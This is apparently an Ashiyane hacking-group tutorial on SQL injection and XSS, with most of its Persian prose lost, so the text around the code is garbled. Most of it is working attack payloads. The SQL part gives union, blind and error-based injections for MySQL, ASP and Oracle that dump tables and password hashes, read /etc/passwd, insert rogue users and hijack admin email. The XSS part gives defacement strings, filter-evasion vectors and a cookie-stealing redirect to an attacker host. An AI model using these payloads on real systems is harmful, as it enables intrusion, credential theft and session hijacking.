SQL INJECTION , XSS

yahoo2010 :
:
http://ashiyane.org/forums :
Y ! : ali_rezamilan
1390 / 06 / 06 :


1
sql injection - 2
xss 3

SQL Injection

 .
!! .
SQL Application! :
Login:
Login ID Password SQL
. :
& SELECT+COUNT(UserID)+FROM+tblUsers+WHERE+UserID= & UserID.Text & AND Pass= & Password.Text
UserID Password TextBox .
mahdi SQL :
SELECT+COUNT(UserID)+FROM+tblUsers+WHERE+UserID=mahdi+AND+Pass=123

. :
OR 1=1
SQL :
SELECT+COUNT(UserID)+FROM+tblUsers+WHERE+UserID=OR
1=1
AND
=PASS
SQL
= OR UserID 1=1
Attacker Authenticate .
SQL
Server .
!
ASP.NET .
:
:
Dim strSQL As String = SELECT COUNT(UserID) FROM tblUsers WHERE
UserID=@UserID AND Password=@Password
)Dim cmndCheck As OleDbCommand = New OleDbCommand(strSQL, _Connection
;)cmndCheck.Parameters.Add(@UserID, UserID.Text
;)cmndCheck.Parameters.Add(@Password, Password.Text
)(cmndCheck.Connection.Open
)(Dim IsValid As Integer = cmndCheck.ExecuteScalar
If IsValid > 0
Some Code here User is authenticated
Else
Some Code here User is not aututorized to view the page
End If

 SQL Single Quote

OleDbCommand cmndCheck
ExecuteScalar
.
) _ Connection ConnectionString (

SQL Injection .
& + .

Application .
Application Customize
.
SQL Injection:

XSS

XSS CSS Cross Site Scripting

CSS Cascading Style Sheat XSS
.

Query string
:

=http://www.folan.com/login.php?bahman

>http://www.folan.com/login?bahman=<h1>salam</h1

html


.
cookie


http://foloan/bahman.php/n=<script>document.location.replace('http://nofozgar
>/begir?borohalakon=document.cookie)</script

);

SQL PHP WITH BYPASS

-999/**/order/**/by/**/cloumn/*
------------------------------999/**/and/**/1=0/**/union/**/all/**/select/**/cloumn/*
------------------------------999+order+by+cloumn-------------------------------999+and+1=0+union+all+select+cloumn-------------------------------999+and+1=0+union+all+select+cloumn+from+user------------------------------Note : version 4 bayad name table ha ro hads zad : from+user or users or ...
------------------------------999+and+1=0+union+all+select+cloumn(1,2,user,password)+from+users------------------------------999/**/and/**/1=0/**/Union/**/all/**/Select+column/**/from+iNformatTion_Schem
a------------------------------For get tables :
999+and+1=0+Union+all+Select+column+(table_name)+from+iNformatTion_Schema.tab
les------------------------------For get tables with bypass :
999/**/and/**/1=0/**/Union/**/all+Select/**/column+(table_name)+from+iNformat
Tion_Schema.tables------------------------------For get tables with group_concat :

999+and+1=0+Union+all+Select+column+group_concat(table_name)+from+iNformatTio
n_Schema.tables--

-----------------------------Note : baraye Get kardane column ha be jaye (table_name) va

information_schema.tables gharar bedin : (column_name) va
information_schema.columns
-----------------------------Illegal in Command :

999+Union+Select+all+1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8+from+iNformation_sche
ma.columns-999+Union+Select+all+1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8+from+iNformation_schema
.tables-------------------------------

SQL ASP

'having 1=1--

dar login or username bad login konid

avalin table mesal:

b2b_supplier_id
b2b_supplier_loginname
-----------------------------'group by b2b_supplier_id having 1=1-- ( dobare dakhele login or username
bad login konid ta table badi bedast biad )
------------------------------

-----------------------------'group by b2b_supplier_id,b2b_supplier_loginname having 1=1-- ( be hamin

tartib ta bedast avardane table akhar )
-----------------------------Note : inghad mirim julu ta dg be ma error nade
------------------------------

MYSQL INJECTION COMMAND

Basics ( )

SELECT * FROM login /* foobar */

SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Variations ( )

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE
"%root%"
SHOW TABLES
SELECT * FROM login
SELECT VERSION
SELECT * FROM login
SELECT host,user,db
SELECT * FROM login

WHERE id = 1 or 1=1; SHOW TABLES

WHERE id = 1 or 1=1; SELECT VERSION()
from mysql.db
WHERE id = 1 or 1=1; select host,user,db from mysql.db;

Blind injection vectors ( VECTORS )

Operators :

SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;

Evaluate :
all render TRUE or 1.
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);

Math :
SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);

Misc :
SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');

Benchmark :
SELECT BENCHMARK(10000000,ENCODE('abc','123'));

this takes around 5 sec on a localhost

SELECT BENCHMARK(1000000,MD5(CHAR(116)))

this takes around 7 sec on a localhost

SELECT BENCHMARK(10000000,MD5(CHAR(116)))

this takes around 70 sec on a localhost

Using the timeout to check if user exists :
SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Gathering info ( )

Table mapping :
SELECT COUNT(*) FROM tablename

Field mapping :
SELECT
SELECT
SELECT
SELECT

*
*
*
*

FROM
FROM
FROM
FROM

tablename
tablename
tablename
tablename

WHERE
WHERE
WHERE
WHERE

user
user
user
user

LIKE "%root%"
LIKE "%"
= 'root' AND id IS NOT NULL;
= 'x' AND id IS NULL;

User mapping :
SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors : ( vectors )

Writing info into files

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'

Writing info into files without single quotes: (example)

SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
INTO
OUTFILE
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(
39))

The CHAR() quoteless function

SELECT * FROM login WHERE user =

CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes :
SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

Example :
SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

SELECT user FROM login WHERE user = 'admin'

UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5('x')),null) FROM login

explaining: (password field,start character,select length) :

is like: (password,1,2) this selects: ab

is like: (password,1,3) this selects: abc
is like: (password,1,4) this selects: abcd

A quoteless example :
SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

: 0 to 9 ASCII 48 to 57 ~ a to z ASCII 97 to 122

Misc : ( )

Insert a new user into DB :

INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve /etc/passwd file, put it into a field and insert a new user :
load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user
=
'r00t', pass = 'abc'

Then login !
Write the DB user away into tmp :
SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change admin e-mail, for forgot login retrieval.

UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';

Bypassing PHP functions : ( )

(MySQL 4.1.x before 4.1.20 and 5.0.x)

Bypassing addslashes() with GBK encoding :
WHERE x = 0xbf27admin 0xbf27

Bypassing mysql_real_escape_string() with BIG5 or GBK :

"injection string"

the above chars are Chinese Big5 ( )

Advanced Vectors : ( vectors )

Using an HEX encoded query to bypass escaping :
Normal :
SELECT * FROM login WHERE user = 'root'

Bypass :
SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL :

Normal :

insert into login set user = root, pass = root

Bypass :

insert into login set user = 0x726F6F74, pass = 0x726F6F74

How to determin the HEX value for injection :
SELECT HEX('root');

gives you :
726F6F74

then add :
0x

Update database MYSQL in SQL injection

MYSQL

: USER USERNAME
WWW.SITE.COM/INDEX.PHP?ID=42 update+user+set+username=alireza-( ) : password
e10adc3949ba59abbe56e057f20f883e : 123456

WWW.SITE.COM/INDEX.PHP?ID=42 update+user+set+password= e10adc3949ba59abbe56e057f20f883e--

Oracle SQL Injection in web applications

Common SQL Injection Strings for Oracle Databases

: 1
' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--

Display the database version information in an error message (injected

into a string)
[low privilege]

( ) Common Problems

Java not installed

Oracle 11g ACL
PUBLIC privilege removed

==> use an alternative function

: 2

or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--

:
Display the database version information in an error message (injected into an
integer)
[low privilege]

Java not installed

Oracle 11g ACL
PUBLIC privilege removed

==> use an alternative function

: 3
or 1=utl_inaddr.get_host_address((select sys.stragg (distinct username||chr(32)) from
all_users))--

Display a list of all usernames (11g only)

[low privilege]


if stragg, it is possible to do the same using XMLDB stragg is limited to 4096
bytes

: 4

or 1=utl_inaddr.get_host_address((Select granted_role from ( select rownum r,

granted_role from user_role_privs) where r=1))

Get the privileges of this account. Iterate via r=1, r=2, r=3, ...
[low privilege]


No

: 5
or 1=utl_inaddr.get_host_address((SELECT sys_context('USERENV', 'ISDBA')
FROM dual)) or 1=utl_inaddr.get_host_address((SELECT sys_context((select
chr(85)||chr(83)||chr(69)||chr(82)||chr(69)||chr(78)||chr(86) from dual), (select
chr(73)||chr(83)||chr(68)||chr(66)||chr(65) from dual)) FROM dual))

check if DBA, result: TRUE or FALSE

[low privilege]


If the usage of single quotes returns an ORA-0911 (invalid character) you should
use the second string

: 6
or 1=utl_inaddr.get_host_address((select sys.stragg (distinct
table_name||chr(58)||column_name||chr(58)||data_type||chr(58)||column_id||chr(59))
from user_tab_columns order by table_name,column_id))-:
Get a list of all user tables including the column name and type
[low privilege]
:
No
:
No

Oracle Common Commands

String Concatenation

Description

'a' || 'b'
concat('a','b')

concatenate 2 strings together. This syntax can be used for

the split-and-balance technique.
concatenate 2 strings together via the concat group.

TBD

Read files in SELECT statements.

Blind SQL Injection

Generating Oracle Error Messages containing information

String Concatenation

1 or 1 = ordsys.ord_dicom.getmappingxpath((select
banner from v$version where
rownum=1),user,user)--

1 or 1= CTXSYS.DRITHSX.SN(user,(select banner
from v$version where rownum=1))--

Message

ORA-53044: Invalid Tag: ORACLE DATABASE 11G

ENTERPRISE EDITION RELEASE 11.1.0.7.0 PRODUCTION

ORA-20000: Oracle Text-Error: DRG-11701: Thesaurus

Oracle Database 11g Enterprise Edition Release
11.1.0.7.0 - Production does not exists

 valid .
scott

ORA-01756 - Anfhrungsstrich fehlt bei Zeichenfolge :

:
http://www.google.com/search?q=ora-01756

 :
http://www.techonthenet.com/oracle/errors/ora01756.php
:

 sql injection .

string
or 1=1--

UNION SELECT
.

 1


:
or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--

 . ORA-01756 .
50 . 50 .
firefox
:
https://addons.mozilla.org/de/firefox/addon/web-developer
or
https://addons.mozilla.org/de/firefox/addon/60

post Get string URL

 : ORA-01756
ORA-24247 Netzwerkzugriff von Access Control List (ACL) abgelehnt.
:
)ORA-24247 network access denied by access control list (ACL

.
DNS utl_inaddr
http://psoug.org/reference/utl_inaddr.html
:

 ult_inaddr :
ctxsys.drithsx.sn
:
or 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))--

ORA-20000: Oracle Text-Fehler :

11g DRG-11701 : 11.1.0.7.0
v $ .
)(select banner from v$version where rownum=1

 1 1 . 1
| | (col1 | | col2).

pentesters rownum .

11g stragg :
.
stragg :
or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct banner)|| from v$version))--

or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct granted_role||;') from

user_role_privs))--

:
);]|| or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct owner||.'||table_name||['||data_type
from all_tab_columns where column_name=PASSWORD))--

SHOP.SHOWUSER .
.

 :
or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct password||;') from
shop.shopuser))--

UNION SELECT
.

or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))- or 1=utl_inaddr.get_host_address((select sys.stragg(distinct granted_role||;') from
user_role_privs))- or 1=utl_inaddr.get_host_address((select sys.stragg(distinct
owner||.'||table_name||['||data_type||];) from all_tab_columns where
column_name=PASSWORD))- or 1=utl_inaddr.get_host_address((select sys.stragg(distinct password||;') from
shop.shopuser))--

Strings SQL :
'
/
*

Xss ( cross site scripting )

xss

<SCRIPT>alert(XSS);</SCRIPT>

<script><img=http://up6.iranblog.com/uploads/13140259851.jpg>hack by
yahoo2010</img></script>

<script>alert("String.fromCharCode(104, 97, 99, 107, 32, 98, 121, 32, 121, 97,
<104, 111, 111, 50, 48, 49, 48)")</script>

><h1><img=http://up6.iranblog.com/uploads/13140259851.jpg>hack by
yahoo2010</img></h1>

"><iframe src=http://www.google.de>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83
))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,8
3,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SC

'';!--"<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG
SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;
&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&
#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000
040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x
72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="jav

ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT>alert(/XSS/.source)</SCRIPT>

\";alert('XSS');//

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>

<IMG LOWSRC="javascript:alert('XSS')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<IMG SRC='vbscript:msgbox("XSS")'>

<DIV STYLE="backgroundimage:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074
\003a\0061\006c\0065\0072\0074\0028\0027\0058\0053\0053\0027\0029'\0029">

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

><script >alert(document.cookie)</script>

%253cscript%253ealert(document.cookie)%253c/script%253e

; alert(document.cookie); var foo=

Special Tnx 2 :ashiyane digital Security Team, All Iranian Hackerz

Copy Right For :ashiyane digital Security team 2011

For more Informattion go to : http://ashiyane.org/